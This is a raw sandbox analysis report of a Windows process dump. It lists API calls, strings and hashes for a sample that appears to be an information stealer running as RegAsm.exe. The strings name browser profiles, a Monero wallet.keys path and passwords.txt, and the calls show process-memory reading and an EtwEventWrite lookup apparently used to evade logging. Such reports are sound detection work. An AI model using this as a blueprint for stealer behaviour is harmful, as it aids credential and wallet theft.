                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                • API String ID: 0-1710495004
                                                                • Opcode ID: 0395fb4dbaf7060479cd39e257e6a94a206c6f9b995784019cb33d1d46c9cdf4
                                                                • Instruction ID: c4b769843fd96ba5a9993bec0907288b27e6520762e28c1f4f52d27b6ca0eed4
                                                                • Opcode Fuzzy Hash: 0395fb4dbaf7060479cd39e257e6a94a206c6f9b995784019cb33d1d46c9cdf4
                                                                • Instruction Fuzzy Hash: 0E021D71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3191DBB86FC98F88
                                                                APIs
                                                                • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
                                                                • _memset.LIBCMT ref: 0040FBC1
                                                                • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17
                                                                  • Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: OpenProcess_memmove_memset
                                                                • String ID: N0ZWFt
                                                                • API String ID: 2647191932-431618156
                                                                • Opcode ID: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                • Instruction ID: eb1f70013287725bf786605e83da5f1b289e944c87060308bf9427b65ac1957a
                                                                • Opcode Fuzzy Hash: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                • Instruction Fuzzy Hash: 045191B1D0022C9FDB309F54DC85BDDB7B9AB44308F0001FAA609B7692D6796E89CF59
                                                                APIs
                                                                • ??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040F934
                                                                • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000), ref: 0040F95E
                                                                • ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 0040F9AB
                                                                • ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0040FA04
                                                                • VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 0040FA5C
                                                                • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040FA6D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryProcessQueryReadVirtual
                                                                • String ID: @
                                                                • API String ID: 3835927879-2766056989
                                                                • Opcode ID: a9495d4f72b3d1438dfa2c68789035a7ae4ab924da08034bdec0029a689f928b
                                                                • Instruction ID: 782d1e78530d26aac93c20cf39dad9713f636d1ba6f6d7f846141922d26d4ee5
                                                                • Opcode Fuzzy Hash: a9495d4f72b3d1438dfa2c68789035a7ae4ab924da08034bdec0029a689f928b
                                                                • Instruction Fuzzy Hash: B8419D32A00209BBDF209FA5DC49FDF7B76EF44760F14803AFA04A6690D7788A55DB94
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _memset$ObjectSingleWait
                                                                • String ID: .exe$EMPTY$b26735cbe8ca9e75712ffe3aa40c4a60
                                                                • API String ID: 12478032-1726762705
                                                                • Opcode ID: da98412cd0fca0d2dacfb30b786c0da5571b21292ec69777b9e3a3bd8ecb39d3
                                                                • Instruction ID: 30b7237e4d63740a0c3ffa21d4e9ba1d0fd5571b7a7901b34f1eecf9535dda31
                                                                • Opcode Fuzzy Hash: da98412cd0fca0d2dacfb30b786c0da5571b21292ec69777b9e3a3bd8ecb39d3
                                                                • Instruction Fuzzy Hash: 99814FB2E40129ABCF11EF61DD46ACD7779AB08309F4054BAB708B3051D679AFC98F58
                                                                APIs
                                                                • lstrlenA.KERNEL32(?,75AA5460,?,00000000), ref: 0040DBBB
                                                                • strchr.MSVCRT ref: 0040DBCD
                                                                • strchr.MSVCRT ref: 0040DBF2
                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
                                                                • strcpy_s.MSVCRT ref: 0040DC6F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrlenstrchr$strcpy_s
                                                                • String ID: 0123456789ABCDEF
                                                                • API String ID: 1957064729-2554083253
                                                                • Opcode ID: 0591f5e3b86716f88ad539bd5f33fabdaa38383dfe43ffecb2f19c092cffc913
                                                                • Instruction ID: be699800860e389eb7f033a368984428232de7924aec9246af203248711cb49e
                                                                • Opcode Fuzzy Hash: 0591f5e3b86716f88ad539bd5f33fabdaa38383dfe43ffecb2f19c092cffc913
                                                                • Instruction Fuzzy Hash: 18315D71D002199FDB00DFE8DC49ADEBBB9AF09355F100179E901FB281DB79A909CB94
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Name::operator+$NameName::
                                                                • String ID: throw(
                                                                • API String ID: 168861036-3159766648
                                                                • Opcode ID: acf3c3f6b62bbe0bf60cea1499b19d7b2d2c206c409909a41351c69a4c2d4579
                                                                • Instruction ID: f88cabbda18bcd4624fad7201f608a4b7bec8680ec46b3ab11068729d5ffd4ff
                                                                • Opcode Fuzzy Hash: acf3c3f6b62bbe0bf60cea1499b19d7b2d2c206c409909a41351c69a4c2d4579
                                                                • Instruction Fuzzy Hash: 87019B70600208BFCF14EF64D852EED77B5EF44748F10406AF905972A5DA78EA8B878C
                                                                APIs
                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,74DE83C0,00000000,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C019
                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0041C58F,?,00416F27), ref: 0041C049
                                                                • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C075
                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C083
                                                                  • Part of subcall function 0041B991: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0041B9C5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                                • String ID: 'oA
                                                                • API String ID: 3986731826-570265369
                                                                • Opcode ID: 5a4a7b219b2098a5fb872391a6b6813c9c431c7c45877e2e4ef416b00ba26d56
                                                                • Instruction ID: 1898f3f14c485dfe9e4ef6ed33e1055e23cef853a536fbea19f5c84a704e6684
                                                                • Opcode Fuzzy Hash: 5a4a7b219b2098a5fb872391a6b6813c9c431c7c45877e2e4ef416b00ba26d56
                                                                • Instruction Fuzzy Hash: DA416D71800209DFCF14DFA9C880AEEBFF9FF48310F10416AE855EA256E3359985CBA4
                                                                APIs
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040F2C7
                                                                  • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
                                                                  • Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
                                                                  • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040F2E6
                                                                • _memmove.LIBCMT ref: 0040F320
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                • String ID: invalid string position$string too long
                                                                • API String ID: 3404309857-4289949731
                                                                • Opcode ID: eafd812e86a1b85e87936770ea95ce4ffc0e42962baa9f97ece83f385a396649
                                                                • Instruction ID: 57eaf4f8ed72a9c9f24929b0a4870ba8c902719b5e729f6aa90dd4ccac796c9b
                                                                • Opcode Fuzzy Hash: eafd812e86a1b85e87936770ea95ce4ffc0e42962baa9f97ece83f385a396649
                                                                • Instruction Fuzzy Hash: 6611E0713002029FCB24DF6DD881A59B3A5BF45324754053AF816EBAC2C7B8ED498799
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _freemalloc
                                                                • String ID:
                                                                • API String ID: 3576935931-0
                                                                • Opcode ID: feda3816294fd9af8db34316e038ce1953c349d56468ddbca55d0205ef3a299f
                                                                • Instruction ID: b76dc663818b464284d97c71afdab2e33c7188303a79513cbdb4af8dfc28d3f2
                                                                • Opcode Fuzzy Hash: feda3816294fd9af8db34316e038ce1953c349d56468ddbca55d0205ef3a299f
                                                                • Instruction Fuzzy Hash: CB112732B40A31EBCF216F79BC0575A37A5AF803B5F60403FF8498A250DE7C8980969C
                                                                APIs
                                                                • __getptd.LIBCMT ref: 00426725
                                                                  • Part of subcall function 00424954: __getptd_noexit.LIBCMT ref: 00424957
                                                                  • Part of subcall function 00424954: __amsg_exit.LIBCMT ref: 00424964
                                                                • __getptd.LIBCMT ref: 0042673C
                                                                • __amsg_exit.LIBCMT ref: 0042674A
                                                                • __lock.LIBCMT ref: 0042675A
                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 0042676E
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                • String ID:
                                                                • API String ID: 938513278-0
                                                                • Opcode ID: e5b528c2df55b90b8f95683bbe5c3f4538672bfb3054380b72a1938f3589f922
                                                                • Instruction ID: 61088e3dfc20ce59d559a3ddfa1e0e88c0a27e6c6fc14d0a94ffceeb635e971d
                                                                • Opcode Fuzzy Hash: e5b528c2df55b90b8f95683bbe5c3f4538672bfb3054380b72a1938f3589f922
                                                                • Instruction Fuzzy Hash: A0F09672F047309BDB11FB79740675E76A0AF4076CFA2014FF454A62D2CB2C5940D65D
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: strtok_s
                                                                • String ID: false$true
                                                                • API String ID: 3330995566-2658103896
                                                                • Opcode ID: a18d29ee398d6b1f39d97ebb51de1a74a8bbd1f5cfece70202c7ebcd8168d57f
                                                                • Instruction ID: c59aadfba82ba9961634352731141a8533392cfc76d17a14f51357a5b51db833
                                                                • Opcode Fuzzy Hash: a18d29ee398d6b1f39d97ebb51de1a74a8bbd1f5cfece70202c7ebcd8168d57f
                                                                • Instruction Fuzzy Hash: 5DB16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _memset
                                                                • String ID: ERROR_RUN_EXTRACTOR$v10$v20
                                                                • API String ID: 2102423945-380572819
                                                                • Opcode ID: 93e336829a09b04c9a22f2871bb72d6da27ca2d0679549906ea092d0de62e08c
                                                                • Instruction ID: daba9ed892d092cabdd565eab6a30784efdfa5406d791c1b040b6213e04440cf
                                                                • Opcode Fuzzy Hash: 93e336829a09b04c9a22f2871bb72d6da27ca2d0679549906ea092d0de62e08c
                                                                • Instruction Fuzzy Hash: 0141B3B2A00118ABCF10DFA5CD42ADE3BB8AB84714F15413BFD40F7280EB78D9458B99
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: strtok_s
                                                                • String ID: DwA$block
                                                                • API String ID: 3330995566-4170876926
                                                                • Opcode ID: b2a6181841c0a819a6165bd9744e598bbe62174f59a4a8c8ae2e29f6798705dd
                                                                • Instruction ID: 9e2abf34b02cddae1b0fa04c6dc88f1d30775994422634f8dc56bb1647053282
                                                                • Opcode Fuzzy Hash: b2a6181841c0a819a6165bd9744e598bbe62174f59a4a8c8ae2e29f6798705dd
                                                                • Instruction Fuzzy Hash: 7B414F70A48306BBEB44DF60DC49E9A7B6CFB1870BB206166E402D2151FB39B781DB58
                                                                APIs
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0041009A
                                                                  • Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC0D
                                                                  • Part of subcall function 0042EBF8: __CxxThrowException@8.LIBCMT ref: 0042EC22
                                                                  • Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC33
                                                                • __EH_prolog3_catch.LIBCMT ref: 00410139
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0041014D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
                                                                • String ID: vector<T> too long
                                                                • API String ID: 2448322171-3788999226
                                                                • Opcode ID: cc5a60ddabb20db1201aed0d317c3cbb809968f8e12f32ad08655375e537c1c5
                                                                • Instruction ID: ab79b4cfd7630e9d33afc21f0db27ea74fca8642dd6ebc8e538bd538cb18ba69
                                                                • Opcode Fuzzy Hash: cc5a60ddabb20db1201aed0d317c3cbb809968f8e12f32ad08655375e537c1c5
                                                                • Instruction Fuzzy Hash: 7931E532B503269BDB08EF6DAC45AED77E2A705311F51107FE520E7290D6BE9EC08B48
                                                                APIs
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040F282
                                                                  • Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC0D
                                                                  • Part of subcall function 0042EBF8: __CxxThrowException@8.LIBCMT ref: 0042EC22
                                                                  • Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC33
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040F28D
                                                                  • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
                                                                  • Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
                                                                  • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                • String ID: invalid string position$string too long
                                                                • API String ID: 1823113695-4289949731
                                                                • Opcode ID: 941df7bd290407a9ef689aa40561f47c5295f4f3ec763d10fe6edd7e59272ef7
                                                                • Instruction ID: e6539817a9f8634559db26b0b382dc9566da10c2029d1fc652b1cb6cacdddcbf
                                                                • Opcode Fuzzy Hash: 941df7bd290407a9ef689aa40561f47c5295f4f3ec763d10fe6edd7e59272ef7
                                                                • Instruction Fuzzy Hash: 55D012B5A4020C7BCB04E79AE816ACDBAE99B58714F20016FB616D3641EAB8A6004569
                                                                APIs
                                                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00412301,?), ref: 00411D6C
                                                                • HeapAlloc.KERNEL32(00000000), ref: 00411D73
                                                                • wsprintfW.USER32 ref: 00411D84
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$AllocProcesswsprintf
                                                                • String ID: %hs
                                                                • API String ID: 659108358-2783943728
                                                                • Opcode ID: 3ad6661e342435e3454c6033efd35680c758cdf589e793b7d7a2c9c560a2e302
                                                                • Instruction ID: 516a0af99a9d3ed9a850d6bfca40a0a85ae49b58000b6b42a5d70a6c01262027
                                                                • Opcode Fuzzy Hash: 3ad6661e342435e3454c6033efd35680c758cdf589e793b7d7a2c9c560a2e302
                                                                • Instruction Fuzzy Hash: F2D0A73134031477C61027D4BC0DF9A3F2CDB067A2F001130FA0DD6151C96548144BDD
                                                                APIs
                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00401402
                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040140D
                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00401416
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CapsCreateDeviceRelease
                                                                • String ID: DISPLAY
                                                                • API String ID: 1843228801-865373369
                                                                • Opcode ID: cf640d80628ad4e74f3d38171acba973207c28ae387d92be87cd61cc0b75c439
                                                                • Instruction ID: 9bbdd1ee4896165f6ac39e3e5efd8c25d27bca58a6bb0b57e2a538c7cae0429d
                                                                • Opcode Fuzzy Hash: cf640d80628ad4e74f3d38171acba973207c28ae387d92be87cd61cc0b75c439
                                                                • Instruction Fuzzy Hash: C9D012353C030477E1781B50BC5FF1A2934D7C5F02F201124F312580D046A41402963E
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 004018BA
                                                                • GetProcAddress.KERNEL32(00000000,EtwEventWrite), ref: 004018CB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: EtwEventWrite$ntdll.dll
                                                                • API String ID: 1646373207-1851843765
                                                                • Opcode ID: e7173cbc659f646d90c6637380379b2e67bafee961351022300d75924a4236c6
                                                                • Instruction ID: fa0301676ac4a0b35d6f0bad7f9db5a069fcd374a286a1e4a3065c0da922a8bc
                                                                • Opcode Fuzzy Hash: e7173cbc659f646d90c6637380379b2e67bafee961351022300d75924a4236c6
                                                                • Instruction Fuzzy Hash: 84B09B7078020097CD1467756D5DF07766566457027506165A645D0160D77C5514551D
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DecodePointer__getptd_noexit__lock_siglookup
                                                                • String ID:
                                                                • API String ID: 2847133137-0
                                                                • Opcode ID: 77078d732e8db2f3057a63753f0641dcf993b0cab592a8a63a99ae8e35919d99
                                                                • Instruction ID: 069d67ce00bac186bc9f3ac32ad7eb6d288c3b8fedd6e0a8a483a63bcb82f46d
                                                                • Opcode Fuzzy Hash: 77078d732e8db2f3057a63753f0641dcf993b0cab592a8a63a99ae8e35919d99
                                                                • Instruction Fuzzy Hash: 37415C70F00A25DBCB289F68E884AADB6B0FF45315BA4416BE801A7391C73D9D51CF6D
                                                                APIs
                                                                • malloc.MSVCRT ref: 0041BDC5
                                                                • _memmove.LIBCMT ref: 0041BDD9
                                                                • _memmove.LIBCMT ref: 0041BE26
                                                                • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,0041AE6B,?,00000001,?,?,?), ref: 0041BE45
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _memmove$FileWritemalloc
                                                                • String ID:
                                                                • API String ID: 803809635-0
                                                                • Opcode ID: f8d90d2511c155f796a90aa74a79be86cc9cbc5625099fdc230df8e4b929144d
                                                                • Instruction ID: ef32b456043a7c40364d1b26fe1d6b34c9da03a70a3abd589478dda37aa5024c
                                                                • Opcode Fuzzy Hash: f8d90d2511c155f796a90aa74a79be86cc9cbc5625099fdc230df8e4b929144d
                                                                • Instruction Fuzzy Hash: FB318F75600704AFD765CF65E980BE7B7F8FB45740B40892FE94687A00DB74F9448B98
                                                                APIs
                                                                • ??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9F7
                                                                  • Part of subcall function 0040A7D8: _memset.LIBCMT ref: 0040A815
                                                                  • Part of subcall function 0040A7D8: _memmove.LIBCMT ref: 0040A8BB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _memmove_memset
                                                                • String ID: passwords.txt$pe
                                                                • API String ID: 3555123492-1761351166
                                                                • Opcode ID: 6515523e2a9acb22778a198fb2e3cfaa62e68f67476996d2fc7beb9edd0c2087
                                                                • Instruction ID: 1a907496ddc9cbec6b75df531e31c39fb9952b717cdae40389231e62c8e49acd
                                                                • Opcode Fuzzy Hash: 6515523e2a9acb22778a198fb2e3cfaa62e68f67476996d2fc7beb9edd0c2087
                                                                • Instruction Fuzzy Hash: DF71A331500215ABCF15EFA1DD4DD9E3BBAEF4830AF101015F901A31A1EB7A5A55CBA6
                                                                APIs
                                                                • _memset.LIBCMT ref: 00401ADC
                                                                  • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                  • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateObjectSingleThreadWait_memset
                                                                • String ID: .keys$\Monero\wallet.keys
                                                                • API String ID: 3287460435-3586502688
                                                                • Opcode ID: 9359cae915823e38a0877a8fcf4fce719fd494ef31168c192ff5b89dc772d858
                                                                • Instruction ID: 0130a2ac35af31154b38bf277d642d4284bba686758d2f8fdbfb5a94e7082e10
                                                                • Opcode Fuzzy Hash: 9359cae915823e38a0877a8fcf4fce719fd494ef31168c192ff5b89dc772d858
                                                                • Instruction Fuzzy Hash: C95160B1E9012D9BCF11EB25DD466DC7379AF04308F4054BAB608B3191DA78AFC98F58
                                                                APIs
                                                                  • Part of subcall function 00405237: RtlAllocateHeap.NTDLL(00000000), ref: 00405285
                                                                • _memset.LIBCMT ref: 00412CDF
                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00436710), ref: 00412D31
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateCreateHeapProcess_memset
                                                                • String ID: .exe
                                                                • API String ID: 4288379676-4119554291
                                                                • Opcode ID: c5ea114bd9cd131b3ee94c2003750d59ae2b1dadeeb3c1c87c17010cbf83333b
                                                                • Instruction ID: b22801d522c47b455a3bf9a13fec4127fa4a3e5ad37381d5e28ead6c554ce160
                                                                • Opcode Fuzzy Hash: c5ea114bd9cd131b3ee94c2003750d59ae2b1dadeeb3c1c87c17010cbf83333b
                                                                • Instruction Fuzzy Hash: 87418472E00109BBDF11FBA6ED42ACE7375AF44308F110076F500B7191D6B86E8A8BD9
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: strtok_s
                                                                • String ID: "xA
                                                                • API String ID: 3330995566-582338916
                                                                • Opcode ID: bf84bfb386d6fc06eea78c161eafd360b80df2d8d05c54f88f0f7eaf07e2e23e
                                                                • Instruction ID: 530b5b9384520956d988ef5f9eef14088f7e00acaaf5feba0a58aa85cdec459f
                                                                • Opcode Fuzzy Hash: bf84bfb386d6fc06eea78c161eafd360b80df2d8d05c54f88f0f7eaf07e2e23e
                                                                • Instruction Fuzzy Hash: 74118171900115AFDB01DF54C945BDAB7BCBF1430AF119067E805EB192EB78EF988B98
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Xinvalid_argument_memmovestd::_
                                                                • String ID: string too long
                                                                • API String ID: 256744135-2556327735
                                                                • Opcode ID: 8a227626b72f4056b64c0a26e4177402fb02d15917d8bca6e61607cae78b5d0a
                                                                • Instruction ID: 7a0806fae085cf6787416122fb97cfb1012f07200118ac727d966ddb9d8bf46f
                                                                • Opcode Fuzzy Hash: 8a227626b72f4056b64c0a26e4177402fb02d15917d8bca6e61607cae78b5d0a
                                                                • Instruction Fuzzy Hash: D211E371300201AFDB24DE2DD840929B369FF85354714013FF801ABBC2C779EC59C2AA
                                                                APIs
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040F13E
                                                                  • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
                                                                  • Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
                                                                  • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80
